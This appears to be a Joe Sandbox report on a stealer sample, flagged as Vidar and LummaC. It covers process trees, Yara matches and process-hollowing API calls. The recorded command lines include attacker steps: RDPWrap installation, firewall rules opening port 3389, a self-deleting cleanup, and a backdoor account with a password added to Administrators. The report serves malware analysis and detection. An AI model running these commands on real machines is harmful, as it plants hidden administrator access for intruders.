Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	19:37:09
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xbf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2061826674.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:09:19
Start date:	26/09/2024
Path:	C:\ProgramData\GIEHJDHCBA.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GIEHJDHCBA.exe"
Imagebase:	0x8c0000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.1968024042.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 43%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	21:09:19
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	21:09:19
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x310000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:09:19
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x250000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:09:19
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xee0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000010.00000002.2093062671.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:09:21
Start date:	26/09/2024
Path:	C:\ProgramData\BKKFCFBKFC.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BKKFCFBKFC.exe"
Imagebase:	0xfa0000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:09:21
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:09:22
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdc0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:09:23
Start date:	26/09/2024
Path:	C:\ProgramData\CFHIIEHJKK.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\CFHIIEHJKK.exe"
Imagebase:	0xc10000
File size:	73'728 bytes
MD5 hash:	3FCBAACCA9CC6DCCF0649F5ABB8B73EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000000.2001873722.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.2475649051.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\CFHIIEHJKK.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:09:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:09:23
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	21:09:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0x870000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	21:09:23
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0xa40000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:09:28
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGHDAKKJJJKJ" & exit
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	21:09:28
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	21:09:28
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x290000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:09:29
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	21:09:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:09:30
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Imagebase:	0x400000
File size:	1'785'344 bytes
MD5 hash:	C213162C86BB943BCDF91B3DF381D2F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001E.00000002.2111451674.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001E.00000000.2065902266.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000001E.00000000.2066012976.0000000000450000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 0000001E.00000002.2111865526.0000000000450000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	21:09:33
Start date:	26/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Imagebase:	0x7ff7f50e0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:09:33
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	32'600 bytes
MD5 hash:	77FF15B9237D62A5CBC6C80E5B20A492
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	21:09:33
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	169'984 bytes
MD5 hash:	64991B36F0BD38026F7589572C98E3D6
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	21:09:33
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137'728 bytes
MD5 hash:	CC6D4A26254EB72C93AC848ECFCFB4AF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	21:10:04
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user RDPUser_0d457744 eU6fmVsXHNUV /add
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	21:10:04
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user RDPUser_0d457744 eU6fmVsXHNUV /add
Imagebase:	0x870000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user RDPUser_0d457744 eU6fmVsXHNUV /add
Imagebase:	0xa40000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0x870000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0xa40000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x1770000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Administrators" RDPUser_0d457744 /add
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Administrators" RDPUser_0d457744 /add
Imagebase:	0x870000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	21:10:05
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Administrators" RDPUser_0d457744 /add
Imagebase:	0xa40000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	35.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	36.4%
Total number of Nodes:	22
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 031F213D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,031F20AF,031F209F), ref: 031F22AC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 031F22BF
Wow64GetThreadContext.KERNEL32(00000340,00000000), ref: 031F22DD
ReadProcessMemory.KERNELBASE(0000033C,?,031F20F3,00000004,00000000), ref: 031F2301
VirtualAllocEx.KERNELBASE(0000033C,?,?,00003000,00000040), ref: 031F232C
TerminateProcess.KERNELBASE(0000033C,00000000), ref: 031F234B
WriteProcessMemory.KERNELBASE(0000033C,00000000,?,?,00000000,?), ref: 031F2384
WriteProcessMemory.KERNELBASE(0000033C,00400000,?,?,00000000,?,00000028), ref: 031F23CF
WriteProcessMemory.KERNELBASE(0000033C,?,?,00000004,00000000), ref: 031F240D
Wow64SetThreadContext.KERNEL32(00000340,031D0000), ref: 031F2449
ResumeThread.KERNELBASE(00000340), ref: 031F2458

Strings

CreateProcessA, xrefs: 031F21F1
GetP, xrefs: 031F21BF
WriteProcessMemory, xrefs: 031F2250
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 031F22AB
ReadProcessMemory, xrefs: 031F222A
ResumeThread, xrefs: 031F2279
aryA, xrefs: 031F2183
ress, xrefs: 031F21C7
SetThreadContext, xrefs: 031F2263
GetThreadContext, xrefs: 031F2217
VirtualAlloc, xrefs: 031F2204
VirtualAllocEx, xrefs: 031F223D
TerminateProcess, xrefs: 031F233B
Load, xrefs: 031F217B

Memory Dump Source

Source File: 00000002.00000002.1333398966.00000000031F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 031F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_31f1000_file.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 768b997d57d8e84bce54eb093be03ea9ceceb2675ecf2649a843d7f47c4b327d
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 81B1E57664024AAFDB60CF68CC80BDA77A9FF8C714F158564EA0CAB341D774FA418B94

Function 01510C40 Relevance: .3, Instructions: 321
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.1333028707.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1510000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e2cb405670bdb99ae7357a440a71ca0a4b66721218a64f32d17fddb4b53014
Instruction ID: 1df6b8ef650fba7c48672a51292e6816407bf33ed9862cadcbbf389a04c7a9d1
Opcode Fuzzy Hash: 04e2cb405670bdb99ae7357a440a71ca0a4b66721218a64f32d17fddb4b53014
Instruction Fuzzy Hash: E0D19170E042598FDB16CBA9C4816EDFBF2BF48314F188569E455EB29AC734AC81CB90

Function 01511218 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 015112A0

Memory Dump Source

Source File: 00000002.00000002.1333028707.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1510000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d9e2aad75a40bbe8ff9f5564b2eb55590cea5985a07f1e6be5cd360e46113e79
Instruction ID: 1f12d38a44fec85b58d5ce84e02b6f6b953d4fb5bd30f0ca7e5467270a9d1855
Opcode Fuzzy Hash: d9e2aad75a40bbe8ff9f5564b2eb55590cea5985a07f1e6be5cd360e46113e79
Instruction Fuzzy Hash: 0D2120B0C103499FDB20DFAAC880AEEBBF0FF48310F50852AE959A7250C7755900CFA1

Function 01511220 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 015112A0

Memory Dump Source

Source File: 00000002.00000002.1333028707.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1510000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3fc15679bcbb6d2deb5e2cb4f4e5fc6e24808d5bcfea812ddfb29037048accda
Instruction ID: bb45bf553968a8bc7f92c7d35337fb90c1205841f01ef9b1d9e200436f9dce0b
Opcode Fuzzy Hash: 3fc15679bcbb6d2deb5e2cb4f4e5fc6e24808d5bcfea812ddfb29037048accda
Instruction Fuzzy Hash: 862102B1C003499FDB10DFAAC880ADEBBF5FF48310F50842AE919A7250C7756900CBA5

Analysis Process: RegAsm.exePID: 1092, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	19

Executed Functions

Function 00418950 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,004172CA), ref: 00418964
GetProcAddress.KERNEL32 ref: 0041897B
GetProcAddress.KERNEL32 ref: 00418992
GetProcAddress.KERNEL32 ref: 004189A9
GetProcAddress.KERNEL32 ref: 004189C0
GetProcAddress.KERNEL32 ref: 004189D7
GetProcAddress.KERNEL32 ref: 004189EE
GetProcAddress.KERNEL32 ref: 00418A05
GetProcAddress.KERNEL32 ref: 00418A1C
GetProcAddress.KERNEL32 ref: 00418A33
GetProcAddress.KERNEL32 ref: 00418A4A
GetProcAddress.KERNEL32 ref: 00418A61
GetProcAddress.KERNEL32 ref: 00418A78
GetProcAddress.KERNEL32 ref: 00418A8F
GetProcAddress.KERNEL32 ref: 00418AA6
GetProcAddress.KERNEL32 ref: 00418ABD
GetProcAddress.KERNEL32 ref: 00418AD4
GetProcAddress.KERNEL32 ref: 00418AEB
GetProcAddress.KERNEL32 ref: 00418B02
GetProcAddress.KERNEL32 ref: 00418B19
GetProcAddress.KERNEL32 ref: 00418B30
GetProcAddress.KERNEL32 ref: 00418B47
GetProcAddress.KERNEL32 ref: 00418B5E
GetProcAddress.KERNEL32 ref: 00418B75
GetProcAddress.KERNEL32 ref: 00418B8C
GetProcAddress.KERNEL32 ref: 00418BA3
GetProcAddress.KERNEL32 ref: 00418BBA
GetProcAddress.KERNEL32 ref: 00418BD1
GetProcAddress.KERNEL32 ref: 00418BE8
GetProcAddress.KERNEL32 ref: 00418BFF
GetProcAddress.KERNEL32 ref: 00418C16
GetProcAddress.KERNEL32 ref: 00418C2D
GetProcAddress.KERNEL32 ref: 00418C44
GetProcAddress.KERNEL32 ref: 00418C5B
GetProcAddress.KERNEL32 ref: 00418C72
GetProcAddress.KERNEL32 ref: 00418C89
GetProcAddress.KERNEL32 ref: 00418CA0
GetProcAddress.KERNEL32 ref: 00418CB7
GetProcAddress.KERNEL32 ref: 00418CCE
GetProcAddress.KERNEL32 ref: 00418CE5
GetProcAddress.KERNEL32 ref: 00418CFC
GetProcAddress.KERNEL32 ref: 00418D13
GetProcAddress.KERNEL32 ref: 00418D2A
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418D40
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418D56
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418D6C
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418D82
GetProcAddress.KERNEL32(ResumeThread), ref: 00418D98
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418DAE
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418DC4
LoadLibraryA.KERNEL32(004172CA), ref: 00418DD5
LoadLibraryA.KERNEL32 ref: 00418DE6
LoadLibraryA.KERNEL32 ref: 00418DF7
LoadLibraryA.KERNEL32 ref: 00418E08
LoadLibraryA.KERNEL32 ref: 00418E19
LoadLibraryA.KERNEL32 ref: 00418E2A
LoadLibraryA.KERNEL32 ref: 00418E3B
LoadLibraryA.KERNEL32 ref: 00418E4C
